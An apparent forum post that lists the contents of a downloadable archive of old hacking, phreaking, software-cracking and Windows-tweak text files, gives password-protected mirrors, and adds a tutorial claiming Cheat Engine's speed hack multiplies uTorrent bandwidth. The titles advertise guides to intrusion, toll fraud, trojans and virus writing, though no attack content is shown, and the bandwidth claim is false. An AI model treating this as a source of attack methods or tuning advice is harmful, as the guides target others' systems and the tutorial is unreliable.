More Hacking/Compression and Cracks for Dummies.txt 52.75 kB
More Hacking/Computer Bulliten Boards and the Law.txt 56.06 kB
More Hacking/Computer Chrime - Current Practices, Problems and Proposed So.txt 96.53 kB
More Hacking/Computer eMail and Privacy.txt 19.18 kB
More Hacking/Computer Hackers News Articles.txt 5.89 kB
More Hacking/Computer Rights vs First and Forth Amentment Right.txt 44.24 kB
More Hacking/Computer Security.txt 63.52 kB
More Hacking/Computer Security_2.txt 51.94 kB
More Hacking/Computer Viruii.txt 19.98 kB
More Hacking/Computerized Governmental Database Systems Containing Persona.txt 40.34 kB
More Hacking/COPS and Robbers-Unix System Security.txt 35.18 kB
More Hacking/Copyright Guides for Photographers.txt 17.02 kB
More Hacking/Crash Course in X Windows Security.txt 12.45 kB
More Hacking/Crime and Puzzlement.txt 62.34 kB
More Hacking/Cultural Formations in Text-Based Virtual Realties.txt 257.27 kB
More Hacking/Cyberspace and the Legal Matrix- Laws or Confusion.txt 20.53 kB
More Hacking/Dark Angel's Phunky Virus Writing Guide .txt 18.90 kB
More Hacking/Defamation Liability of Computerized Bulliten Board Operators.txt 101.36 kB
More Hacking/Dept of Treasury Letter.txt 11.25 kB
More Hacking/Electronic Bulliten Boards and 'Public Goods' Explainations o.txt 45.84 kB
More Hacking/Electropolos - Communication and Comunity on IRC.txt 112.45 kB
More Hacking/Ethload User's Guide.txt 81.28 kB
More Hacking/Formulating A Company Policy on Access to and Use and Disclos.txt 12.14 kB
More Hacking/Free Speech in Cyberspace.txt 244.25 kB
More Hacking/Gender Issues in Online Communications.txt 24.86 kB
More Hacking/Government Computer Security Techniques.txt 7.88 kB
More Hacking/HACKDICT.TXT 272.00 kB
More Hacking/Hacker Test.txt 20.84 kB
More Hacking/Hackers A-Z.TXT 256.00 kB
More Hacking/Hackers Who Break into Computer Systems.txt 57.40 kB
More Hacking/Hacking Bank Of America's Home Banking System.txt 5.79 kB
More Hacking/Hacking Compuserve Infomation Service.txt 7.43 kB
More Hacking/Hacking Faq.txt 42.06 kB
More Hacking/Hacking GTE Telemail.txt 19.12 kB
More Hacking/Hacking IRC - The Definitive Guide.txt 13.72 kB
More Hacking/Hacking PC-Pursuit Codes.txt 8.10 kB
More Hacking/Hacking Techniques.txt 8.52 kB
More Hacking/Hacking TRW.txt 2.58 kB
More Hacking/Hacking TYMNET.txt 5.79 kB
More Hacking/Hacking Unix System V's.txt 10.93 kB
More Hacking/Hacking Wal-Mart Computers.txt 4.09 kB
More Hacking/Hacking Webpages.txt 3.90 kB
More Hacking/How the Traditional Media Clasifications Fail to Protect in t.txt 40.50 kB
More Hacking/How to crash AOL.txt 4.75 kB
More Hacking/How to dial out of a UNIX System.txt 3.49 kB
More Hacking/How to find Security Holes.txt 15.99 kB
More Hacking/How to get a Shell in 24 hours.txt 7.98 kB
More Hacking/How to Hack UNIX System V.txt 10.93 kB
More Hacking/How to login to a C.B.I. System.txt 3.00 kB
More Hacking/How to send ICQ Bombs.txt 2.33 kB
More Hacking/Information of Hacking AngelFire Websites.txt 3.21 kB
More Hacking/Introduction to Denail of Service.txt 44.78 kB
More Hacking/IP addressing, and gaining IP's.txt 13.70 kB
More Hacking/IP Addressing.txt 13.70 kB
More Hacking/ISSN Numbers- An Introduction.txt 5.96 kB
More Hacking/Junk Mail- How Did They All Get My Address.txt 12.70 kB
More Hacking/LENROS~1.TXT 184.58 kB
More Hacking/LENROS~2.TXT 7.41 kB
More Hacking/MEMETICS.TXT 45.79 kB
More Hacking/MINDVOX.TXT 64.57 kB
More Hacking/MORRIS~1.TXT 31.18 kB
More Hacking/NEIDOR~1.TXT 41.02 kB
More Hacking/NFS Tracing.txt 34.20 kB
More Hacking/Nightline- FBI,Privacy,and Proposed Wire-Tapping Legislation.txt 20.86 kB
More Hacking/NY_2'S Guide to Obtaining An IP Address. .doc 10.50 kB
More Hacking/Organizational Analysis in Computer Science.txt 65.00 kB
More Hacking/PGP Startup Guide.htm 26.00 kB
More Hacking/Presumed Guilty.txt 153.76 kB
More Hacking/Raising Hell with Unix.txt 12.91 kB
More Hacking/Remarks of the President and Vice President to Silicon Valley.txt 37.70 kB
More Hacking/RIGGSB~1.TXT 54.03 kB
More Hacking/RIGGS_~1.TXT 54.03 kB
More Hacking/RIGHTS~1.TXT 7.99 kB
More Hacking/RIVERA.TXT 26.43 kB
More Hacking/Security holes.txt 11.77 kB
More Hacking/Seisure Warrent Documents for Ripco BBS.txt 72.01 kB
More Hacking/Site Security Handbook.txt 247.43 kB
More Hacking/SJ-DEC~1.TXT 45.03 kB
More Hacking/SJ-RESP.TXT 69.59 kB
More Hacking/SMTP-Simple Mail Transfer Protocol.txt 117.61 kB
More Hacking/Summary of FBI Computer Systems.txt 5.07 kB
More Hacking/SUNDEVIL.TXT 100.17 kB
More Hacking/SUPREM~1.TXT 56.70 kB
More Hacking/TCP packet fragment attacks against firewalls and filters.txt 4.39 kB
More Hacking/Telenet-The Secret Exposed.txt 9.91 kB
More Hacking/The Basics of Hacking- Introduction.txt 24.82 kB
More Hacking/The Baudy World of the Byte Bandit-A Postmodernist Interpreta.txt 85.17 kB
More Hacking/The Constitution in Cyberspace.txt 46.60 kB
More Hacking/The Cracking Manual.txt 86.38 kB
More Hacking/The Electronic Communication Privacy Act of 1986 - A Laymans .txt 10.04 kB
More Hacking/The Greatest Hacker of all time.ASC 25.02 kB
More Hacking/The Hacker's League.txt 12.37 kB
More Hacking/The Inner Circle Book's Hacking Techniques.txt 1.96 kB
More Hacking/The Lamahs-Guide to Pirating Software on the Internet.txt 12.21 kB
More Hacking/The M.M.C. Guide to Hacking, Phreaking, Carding.txt 19.11 kB
More Hacking/The National Information Infrastructure-Agenda for Action.txt 96.49 kB
More Hacking/The Newbies Handbook- ' How to beging in the World of Hacking.txt 43.83 kB
More Hacking/The Newbies-User's Guide to Hacking.txt 47.35 kB
More Hacking/The Pre-History of Cyberspace.txt 60.25 kB
More Hacking/The Price of Copyright Violation.txt 73.11 kB
More Hacking/The REAL way to hack RemoteAccess.txt 12.12 kB
More Hacking/The Secret Service, UUCP,and The Legion of Doom.txt 19.63 kB
More Hacking/the UNIX operating system (Berkley 4.2).txt 13.55 kB
More Hacking/Theft of Computer Software-A National Security Threat.txt 12.22 kB
More Hacking/Thoughts on the National Research and Education Network.txt 19.72 kB
More Hacking/Tips on Starting Your Own BBS.1 8.04 kB
More Hacking/undocumented DOS commands.txt 23.17 kB
More Hacking/UNIX Computer Security Checklist.0 49.34 kB
More Hacking/UNIX Use and Security - By the Prophet.txt 153.74 kB
More Hacking/UNIX Use and Security From The Ground Up.htm 135.60 kB
More Hacking/UNIX- A Hacking Tutorial.SIR 82.26 kB
More Hacking/Viruii FAQ.txt 4.07 kB
More Hacking/Virus-Trojan FAQ.txt 1.95 kB
More Hacking/What Files are Legal for Distribution on a BBS.txt 20.83 kB
More Hacking/What To Look For In A Code Hacking Program.htm 5.56 kB
More Hacking/What To Look For In A Code Hacking Program.txt 5.46 kB
More Hacking/What You Should Know About Computer Viruses.DNA 16.91 kB
More Xp Tips and tricks make your computer more faster.txt 46.14 kB
Moving and Removing the Start Button.txt 0.66 kB
Msn Messenger & Gmail.txt 3.69 kB
My Flash Bookmarks, long list of tutorials.txt 2.98 kB
Myth about WPA ( How it is done ), Windows Product Activation Technique.txt 45.54 kB
Nero How To Verify The Validity Of The Sn U Use.txt 0.88 kB
New Hacking Ebooks/A Basic UNIX Overview.rtf 22.46 kB
New Hacking Ebooks/A BEGINNERS GUIDE TO Hacking Unix.txt 6.05 kB
New Hacking Ebooks/A Novice's Guide to Hacking 2004.txt 40.75 kB
New Hacking Ebooks/A Novice's Guide To Hacking.txt 8.58 kB
New Hacking Ebooks/A Short HACKER SPEAK Glossary.txt 9.78 kB
New Hacking Ebooks/A simple TCP spoofing attack.txt 14.60 kB
New Hacking Ebooks/Accessing the bindery files directly.txt 3.97 kB
New Hacking Ebooks/An Architectural Overview of UNIX Network Security.htm 53.27 kB
New Hacking Ebooks/Anonymity complete GUIDE.rtf 28.90 kB
New Hacking Ebooks/ANONYMOUS emails.txt 3.15 kB
New Hacking Ebooks/Anonymous FTP FAQ.htm 28.14 kB
New Hacking Ebooks/ANSIBombs II Tips And Techniques.txt 10.05 kB
New Hacking Ebooks/attacks on networks how to stop.htm 67.77 kB
New Hacking Ebooks/Backdoor.txt 18.71 kB
New Hacking Ebooks/Backdoors.txt 19.15 kB
New Hacking Ebooks/BBS CRASHING TECHNIQUES.txt 3.72 kB
New Hacking Ebooks/Bust Avoidance For Dipshits.txt 5.82 kB
New Hacking Ebooks/Firewall Protection how to.rtf 33.12 kB
New Hacking Ebooks/Guide to Hacking with sub7.doc 106.00 kB
New Hacking Ebooks/hacking and phreaking.doc 168.00 kB
New Hacking Ebooks/Hacking for Dummies Volume 2.doc 147.00 kB
New Hacking Ebooks/Hacking For Newbies.doc 54.00 kB
New Hacking Ebooks/hacking in telnet http://ftp.rtf 57.47 kB
New Hacking Ebooks/hacking on Telnet explained.doc 16.25 kB
New Hacking Ebooks/Hacking On XP 1-5/hacking on XP part 1.doc 4.58 kB
New Hacking Ebooks/Hacking On XP 1-5/hacking on XP part 2.doc 8.25 kB
New Hacking Ebooks/Hacking On XP 1-5/hacking on XP part 3.doc 4.51 kB
New Hacking Ebooks/Hacking On XP 1-5/hacking on XP part 4.doc 0.00 kB
New Hacking Ebooks/Hacking On XP 1-5/hacking on XP part 5.doc 0.00 kB
New Hacking Ebooks/hacking password protected site.doc 26.50 kB
New Hacking Ebooks/Hacking Password Protected Website's.doc 3.06 kB
New Hacking Ebooks/hacking passwords.doc 26.50 kB
New Hacking Ebooks/How to learn to hack in easy steps.doc 100.00 kB
New Hacking Ebooks/How to use the Web to look up information on hacking.doc 16.28 kB
New Hacking Ebooks/IP how to.rtf 5.15 kB
New Hacking Ebooks/NetBios explained.doc 26.68 kB
New Hacking Ebooks/Proxy how to.rtf 3.13 kB
New Hacking Ebooks/Routing Basics.pdf 30.25 kB
New Hacking Ebooks/telnet trick port 25.doc 1.76 kB
New Hacking Ebooks/Yahoo Chat Commands how to.rtf 0.93 kB
New Pc Or New Motherboard.txt 3.77 kB
New Way To Relive Some Zinio File.txt 1.95 kB
news groups the how to do.txt 11.40 kB
Nice list of windows shortcuts.txt 7.50 kB
No Text Icons.txt 0.29 kB
Ntfs Cluster Size, better harddrive performance.txt 1.34 kB
Official Unattended Xp Cd Guide Xp Sp2 @ Msfn.org.txt 0.91 kB
Open Windows Explorer To A Different Default Direc.txt 0.74 kB
Optimize Broadband & Dsl Connections.txt 1.91 kB
Optimize Emule Connection.txt 1.20 kB
Outpost Rules, Outpost rules for system & app.txt 7.32 kB
Outsmarting System File Protection.txt 5.37 kB
Overclocking_Tutorial.txt 7.67 kB
Packet Attacks - Version 1.1, { Packet_Attack_Exlained}.txt 25.94 kB
Part 0 Dc++.txt 4.11 kB
Part 1 Bittorrents.txt 4.19 kB
Part 2 Irc (mirc).txt 4.91 kB
Part 3 http://Ftp.txt 2.71 kB
Partitioning Your Harddisk With Fdisk.txt 2.13 kB
Pc File Extention Listing.txt 26.48 kB
Pc Maintenance Guide.txt 10.20 kB
Peer2mail Tutorial.txt 9.37 kB
Performance Increase Through My Computer.txt 0.53 kB
Phreaking/2600 Hertz Single Tone Generator Schematic.txt 1.95 kB
Phreaking/A List of every TeleNet code that there is.txt 1.96 kB
Phreaking/A List Of Government BBS Numbers.txt 13.07 kB
Phreaking/An Extensive Guide to Bell System Man Holes.txt 10.10 kB
Phreaking/An Introduction into TeleScan.txt 3.98 kB
Phreaking/An Introductory Guide To TeleNet Commands.txt 2.20 kB
Phreaking/Area Codes and Time Zones.txt 4.90 kB
Phreaking/Becoming A Phreaker - The Quick n' Easy Way.txt 17.09 kB
Phreaking/Bell Hell Volume #1.txt 10.29 kB
Phreaking/Bell Hell Volume #2.txt 15.92 kB
Phreaking/Breaker B0X.txt 1.96 kB
Phreaking/busybox.txt 1.61 kB
Phreaking/Cellular Listening with a TV .txt 1.96 kB
Phreaking/Cellular Telephone Phreaking Phile Series VOL 1.txt 10.00 kB
Phreaking/Drake's Phreaking Tutorial.txt 3.34 kB
Phreaking/Hacking VoiceMail Systems.txt 25.89 kB
Phreaking/How BT phone cards works.txt 4.18 kB
Phreaking/How Phone Phreaks are Caught.txt 12.00 kB
Phreaking/How to Bill All Of your Fone Calls To Some Poor, Unsuspecting.txt 11.38 kB
Phreaking/How to make a Free Phone Call.txt 2.16 kB
Phreaking/How to Put an End to Unwanted or Harassing Phone Calls.HAR 12.10 kB
Phreaking/Phone Systems Tutorial by The Jolly Roger.txt 8.68 kB
Phreaking/Phreakers Handbook.txt 9.83 kB
Phreaking/Quick Phone Modifications.txt 4.12 kB
Phreaking/The ABC's of Payphones part 1.txt 2.58 kB
Phreaking/The ABC's of Payphones part 2.txt 2.12 kB
Phreaking/The ABC's of Payphones part 3.txt 2.21 kB
Phreaking/The ABC's of Payphones part 4.txt 2.64 kB
Phreaking/ThE Beige BoX .txt 6.23 kB
Phreaking/The History of British Phreaking.htm 8.29 kB
Phreaking/The M.M.C. Guide to Hacking, Phreaking, Carding.txt 19.11 kB
Phreaking/The Moterola Bible.txt 116.99 kB
Phreaking/The Myth of the 2600Hz Detector .txt 6.55 kB
Phreaking/The Official Phreaker's Manual.txt 499.25 kB
Phreaking/The Phreakers Handbook-1.txt 62.87 kB
Phreaking/The Telephone Works.txt 9.25 kB
Phreaking/The Ultimate Phreaking Guide .txt 1.96 kB
Phreaking/Understanding the Telephone System.txt 16.34 kB
Phreaking/Zen and the Art of Fone Phreaking `97 .txt 66.74 kB
Play Games On PS2 Without ModChip.txt 5.37 kB
Play On A Bnet Emulator, and f off cd key check =).txt 1.81 kB
Port Numbers.txt 40.19 kB
Problem With Internet Navigation, Clean Host File.txt 0.47 kB
Quick Fix For Spyware, Try This Before Doing Surgery on Your OS.txt 1.77 kB
Quick Msc.txt 0.50 kB
Quick Shutdown for XP, How to create a shutdown shortcut..txt 0.54 kB
Quickly Start The Shared Folder Wizard.txt 0.40 kB
Rapidshare hack!!!!! Free premium acount for all.txt 3.08 kB
Rapidshare Hacked, unlimited upload, no countdown.txt 1.72 kB
Rapidshare Timelimit.txt 0.98 kB
Read This! Av Compare!.txt 7.56 kB
Recover A Corrupted System File.txt 1.10 kB
Recover a Quick erased CD RW.txt 3.89 kB
Reformat&Reinstall.txt 2.58 kB
Regedit.exe & Regedt32.exe, Whats the difference.txt 2.87 kB
Registry Disassembled a basic tutorial.txt 7.10 kB
Reinstall Internet Explorer 6.txt 1.13 kB
Release Codes, Read, and Learn....txt 2.29 kB
Remote Desktop Through Company Firewall.txt 2.59 kB
Remote Shutdown.txt 1.22 kB
Remove Linux From Your Pc Safely, ...and restoring your MBR.txt 1.66 kB
Remove Msn Messenger From Xp, several ways...txt 4.99 kB
Removing Banners From Free Webhosts.txt 2.69 kB
Removing Norton Anti-virus 2004, How to remove the Registry Enteries.txt 0.97 kB
Rename 'recycle Bin' To Whatever You Want.txt 0.66 kB
Reregister All .dll Files Within Registry.txt 1.54 kB
Reset your lost Bios Password.txt 4.24 kB
Restore JPG,JPEG,JPE Default File associations, Win XP Tweak.txt 1.28 kB
REVERSE CODING.txt 15.11 kB
Run Aol Without Using Aol Browser & Save Resources, connect permanently and use any browser.txt 0.44 kB
Running A Board forum From Your Own Pc.txt 2.32 kB
Running Vanishing Console Programs With A Click!, Ever had a console program that vanis....txt 1.13 kB
Safely Editing the Registry....txt 1.86 kB
Save Your Desktop Icon Settings.txt 2.18 kB
Saving and loading Photoshop actions.txt 1.79 kB
Scheduled Tasks - Defrag, how to set up scheduled defrags.txt 1.92 kB
ScreenLock Professional v2.0.41.txt 0.04 kB
SEARCH eBOOK in FTP SEARCH ENGINE.txt 0.43 kB
Search For Ebook Server With Google.com.txt 0.35 kB
Search like a real warez d00dz, for warez of course!.txt 0.57 kB
Searching For Something To Download, This may help.txt 0.34 kB
Secret Backdoor To Many Websites.txt 2.09 kB
Secrets Of Lock Picking.txt 53.74 kB
Securing WinXP Pro (with what win-xp has to offer.txt 9.60 kB
Securing your WINDOWS XP computer.txt 1.19 kB
Set Google as your Default Search in IE.txt 0.55 kB
Set Win Explorer to open the folder you want!, Little trick.txt 0.23 kB
sick of inserting winxp cd every time your pc asks, Change Default Location of i386 Folder.txt 3.21 kB
sidebar fix.txt 0.57 kB
Simple Tweaks For Peak Pc Graphics Performance.txt 10.16 kB
Single Click Shutdown.txt 2.82 kB
Single-click To Open An Item..., IF the Folder Options is grayed out.txt 1.19 kB
Slow Loggon Time, one fix for problem.txt 0.96 kB
Slow Opening Of File Dialogs.txt 1.10 kB
Some Cool Site For Tutorials.txt 0.41 kB
Some Google Tricks, again.txt 1.74 kB
Some More Tips To Improve Your Winxp.txt 24.09 kB
Sp2 For Xp Slipstream, Integrate SP2 into your XP CD.txt 10.71 kB
Sp2 Tweaks.txt 3.44 kB
Speed Up Internet.txt 4.46 kB
Speed up menu display.txt 0.54 kB
Speed up Mozilla FireFox.txt 0.45 kB
Speed Up Your Bandwidth By 20% !, Windows uses 20% of your bandwidth.txt 1.02 kB
Speeding up menus in XP.txt 0.27 kB
Speeding up your internet connection under Linux and Windows.html 11.75 kB
Spoofing emails, via telenet.txt 0.41 kB
Standard ASCII Character Set.txt 1.79 kB
Steps to Clean Install XP.txt 8.23 kB
Stop A Restart Process In 3steps.txt 0.29 kB
Stop Annoying Pop-ups Without Pop-up Blockersoutli.txt 1.23 kB
System Changes To Foil Hackers And Browser Hijacke.txt 7.65 kB
System File Checker For Windows Xp.txt 2.26 kB
Tcpip A Mammoth Description, Short and easy-Everything U want to know.txt 50.96 kB
Testing Wattage Consumption Of Your Computer, Measuring your computer's wattage.txt 9.33 kB
The Antivirus Defense-in-Depth Guide.txt 2.77 kB
The difference between DVD-R, DVD+R, DVD+RW and DVD-RW.txt 3.69 kB
The Modern Phreakers Guide To Beige Boxing.txt 4.32 kB
The Modern Phreakers Guide To Payphones.txt 6.98 kB
The Port Guide, Port number and info.txt 24.64 kB
The Ultimate Guide To Installing Windows Xp Sp2.txt 3.14 kB
Three Ways Of Bypass Starforce Cd Protection.txt 2.48 kB
Tip for shutdown windows - virus.txt 0.39 kB
Tips And Tricks, Windows XP.txt 41.24 kB
Tired Of Reinstalling Windows.txt 2.31 kB
To Get And Show The Ip Via Javascript.txt 0.62 kB
Top 5 Myths About Safe Surfing, PC Magazine.txt 3.36 kB
Transferring Data.txt 6.45 kB
Translating Binary To Text.txt 6.22 kB
Translating Binary to Text2.txt 5.72 kB
Trojan Ports.txt 13.83 kB
Turn MSN Messenger Display Pix into User Pix on XP.txt 2.50 kB
Turn Off Unneeded Services, speed up pc.txt 1.56 kB
Tutorial Get the serial number you need.txt 0.88 kB
Tutorial How to create a bootable Windows XP SP1 CD (Nero).txt 2.17 kB
Tutorials - blacksun.box.sk/coding/Base Number Systems.html 7.78 kB
Tutorials - blacksun.box.sk/coding/BASIC C Socket Programming In Unix For Newbies.txt 21.50 kB
Tutorials - blacksun.box.sk/coding/Basics of am 3mp33j3w.txt 18.64 kB
Tutorials - blacksun.box.sk/coding/Batch File Programming.txt 41.70 kB
Tutorials - blacksun.box.sk/coding/BOOLEAN LOGIC GATES.html 14.04 kB
Tutorials - blacksun.box.sk/coding/C++ Tutorial By Clayman.html 23.77 kB
Tutorials - blacksun.box.sk/coding/Creating A Simple Hit Counter In PHP.html 8.77 kB
Tutorials - blacksun.box.sk/coding/Creating A Simple Search Engine In PHP.html 9.62 kB
Where Is Winipcfg In Winxp.txt 0.62 kB
Who's Seeding The Net With Spyware.txt 5.33 kB
Why wait 35 Seconds at eZshare.txt 1.55 kB
Win 2000 Dr. Watsson.txt 0.23 kB
Windows 2000 Tips & Tricks.txt 4.58 kB
Windows 2003 System Restore, How to activate system restore in W2K3.txt 5.47 kB
Windows Scan Count Down Time.txt 0.54 kB
Windows Shortcuts.txt 12.84 kB
WINDOWS TRUE HIDDEN FILES.txt 9.46 kB
Windows Tweak, Hack Your Start Button.txt 3.25 kB
Windows Xp - Speed Up Your Network and Internet Access.txt 2.70 kB
WINDOWS XP HIDDEN APPS.txt 2.59 kB
Windows XP Registry Tweaks.txt 34.05 kB
Windows XP Startup and Performance Tweaks.txt 1.76 kB
Windows Xp Tips 'n' Tricks.txt 28.51 kB
Windows Xp Tweaks, A work in progress.txt 2.98 kB
Windows XP Tweaks.txt 2.37 kB
WinRar Tutorial - Compression profiles, passwords and more.txt 5.78 kB
Winsock 2 Repair.txt 2.10 kB
WinXP 3 Tips.txt 1.87 kB
Winxp Application Defrag, faster access for used programs.txt 0.30 kB
Winxp Applications Startup Time, Decrease your Applications startup time.txt 1.16 kB
WinXP Bootable CD.txt 2.19 kB
Winxp System Response, reboot whitout rebooting.txt 0.61 kB
Winxp Tips And Tricks, Winsock 2 repair.txt 2.19 kB
Xp Auto Install.txt 1.79 kB
Xp Folder View Does Not Stay To You're Setting., Grab your registry editor and join in.txt 1.87 kB
XP REPAIR INSTALL.txt 5.92 kB
XP Tweaking.txt 15.75 kB
Yahoo + geocities Posts.txt 3.07 kB
Yahoo Messeger, no ad's.txt 0.83 kB
You Want Lots Of Music, Appz, Anything, Try Dex Hunting.txt 1.47 kB
Your Home Page Nevr Being Changed.txt 0.50 kB
Your Own Home Server - Introduction.txt 11.25 kB

And Alot more than on the list

download mirror1
download mirror2
Password = crazy-coderz.net  (This password is needed when extracting the file)

Speed up your internet (from 50-100kbps to 1-2mbps) 100% working

[This hack will not work instantly]

You need to install 2 programs..

uTorrent (Other torrenters have not been tested)

Step 1.
Get your torrent downloading.

You will now see your download speed, take a note of that.

Step 2.
Open cheat engine;
And do as this screenshot directs:

[Image: tutorialpicture1.png]

Step 3.
Scroll down to the bottom and find your uTorrent application
And do as this screenshot directs:

Step 4.

Click 'Enable speed hack' Now change the number too '0.1' Then click apply!
As this screenshot directs:

Proof!

Before:

After: